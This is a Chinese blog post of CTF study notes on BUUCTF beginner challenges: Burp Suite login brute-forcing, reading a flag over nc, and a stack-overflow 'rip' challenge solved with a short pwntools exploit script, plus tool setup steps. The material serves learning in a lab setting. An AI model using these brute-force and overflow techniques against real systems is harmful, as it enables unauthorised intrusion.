网络安全学习笔记(3)——Brup suite实践

1.学习网站

BUUCTF在线评测 (buuoj.cn)

CTFHub

攻防世界 (xctf.org.cn)

合天网安实验室-专业提供网络安全\信息安全在线实验服务的网络靶场 (hetianlab.com)

2.BUUCTF题目

2.1第一题,Brup Suite——Basic-BUU BRUTE 1

第一次使用软件的过程中,会出现各种各样的问题,百度一下,你就知道。

总结:该题主要是依靠字典进行爆破(破解),登录的过程有两个输入,分别是账户和密码。

爆破过程依次对账户和密码进行爆破,降低爆破过程的复杂度。

技巧1:爆破过程中不知道目标的Host和Port是啥,通过以下操作可以实现,简而言之:“Send to Intruder”,然后我们发现Host和Port其实是链接里的一部分。(可能学过web的手拿把掐)

原来的链接:http://57d63c4b-7b9b-42ec-8853-12076cada5d5.node4.buuoj.cn:81

Host:57d63c4b-7b9b-42ec-8853-12076cada5d5.node4.buuoj.cn

Port:81

 参考:BUUCTF Brute 1使用BurpSuite爆破详解_bill_fang的博客-CSDN博客

2.2第二题,IDA(静态分析软件)——PWN--test_your_nc

整体思路:

  1. 通过nc远端连接靶场
  2. 用‘ls’命令查看文件是否包含‘flag’
  3. 发现包含‘flag’,直接使用cat flag命令得到‘flag’

输入命令:

nc node4.buuoj.cn 25579
ls
cat flag

​​​​​​​​​

 参考1:BUUCTF PWN-----第1题:test_your_nc_Hex_bing的博客-CSDN博客icon-default.png?t=N4HBhttps://blog.csdn.net/bing_Max/article/details/119947896

参考2:(buuctf) - pwn入门部分wp - rip -- pwn1_sctf_2016 - J1ay - 博客园 (cnblogs.com)icon-default.png?t=N4HBhttps://www.cnblogs.com/Jlay/p/pwn_wp1.html

参考3:IDA工具非常详细的使用说明(非常牛的一个博主,主页有学习路线推荐)

逆向工具之IDA的使用_ida 逆向_Wαff1ε的博客-CSDN博客icon-default.png?t=N4HBhttps://blog.csdn.net/Waffle666/article/details/109753950

2.2第三题,IDA——PWN--rip1

整体思路:

  1. 通过nc链接远端靶场,ls命令发现并没有返回当前目录;
  2. 用pwntools下的checksec查看文件指令架构及保护机制,发现无栈保护->漏洞类型判断——栈溢出;
  3. IDA静态分析,查看具体的漏洞点。
  4. 构造exp,py程序。

1.nc连接,查看有没有flag

2.查看文件架构及保护机制

 

Arch(architecture):指令架构,64位

RELRO(relocation read only):重定位表只读,即.got和.plt。Partial RELRO,部分重定位只读。

Stack:No canary found,未发现栈保护,可以栈溢出。

NX/DEP(Non-Executable Memory):不可执行内存。

PIE/ASLR:开启ASLR(Address space layout randomization,地址空间布局随机化),通过将数据随机放置来防止攻击。

RWX(Read/Write/Execute):读、写、执行权限。

3.IDA静态分析

get()函数不限制输入字符的数量,可以无限输入,因此,该处是一个明显的栈溢出点

转换为可读性较强的代码查看,网上大佬建议不要依赖于代码的可读性,因为有可能会在汇编转代码的过程中遗漏关键信息。因此,最好是直接查看汇编的源代码

 4.构造exp,查看输入s的字节长度为15

from pwn import *

p = remote('node3.buuoj.cn', 27018)
payload = b'a' * 23 + p64(0x401186 + 1)

p.sendline(payload)
p.interactive()

p64(0x401186)是返回的起始地址;

+1保证堆栈平衡(看了一些博客还没懂,师傅们可以留言解答一下);

‘a’前面的b是防止python3运行错误;

5.运行exp文件,得到flag

参考1(题解):(buuctf) - pwn入门部分wp - rip -- pwn1_sctf_2016 - J1ay - 博客园 (cnblogs.com)

参考2(checksec说明):二进制的保护机制 (mamicode.com)

3.工具安装及使用

3.1 checksec安装与使用(安装了半天没弄好,pass,直接装pwntools,可以直接用checksec)

3.1.1.下载链接:

GitHub - slimm609/checksec.sh: Checksec.sh

3.1.2.命令使用

复制文件过程中,注意,cp 文件夹使用的时候加个-r,普通文件不用。

3.1.3.python3-pip3重新安装

ubuntu 系统 apt-get install python3-pip 依赖报错解决方法(源码 get-pip 安装 pip)_apt install python3-pip_wohu1104的博客-CSDN博客icon-default.png?t=N4HBhttps://blog.csdn.net/wohu1104/article/details/105955741

 wget https://bootstrap.pypa.io/get-pip.py
 sudo python3 get-pip.py 
 pip3 -V

3.2 pwntools安装

安装的过程中遇到了各式各样的问题,也不知道是哪一步起了关键的作用,最后用了大佬文章内安装的步骤,重新试了一下。(注意这里我用了此前安装的pip3)

安装过程参考1:

kali安装pwntools_白衣w的博客-CSDN博客icon-default.png?t=N4HBhttps://blog.csdn.net/wyj_1216/article/details/103627154

临时解决参考2:

nullicon-default.png?t=N4HBhttps://www.cnblogs.com/pcat/p/5451780.html

pip3 install pwntools -i https://pypi.tuna.tsinghua.edu.cn/simple/

测试结果(flonggo是我的用户名,kali是系统名)

3.3 IDA安装

kali2020.3 安装IDA freeware_不仅自己可见的博客-CSDN博客icon-default.png?t=N4HBhttps://blog.csdn.net/live4dream/article/details/109176458

 

  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值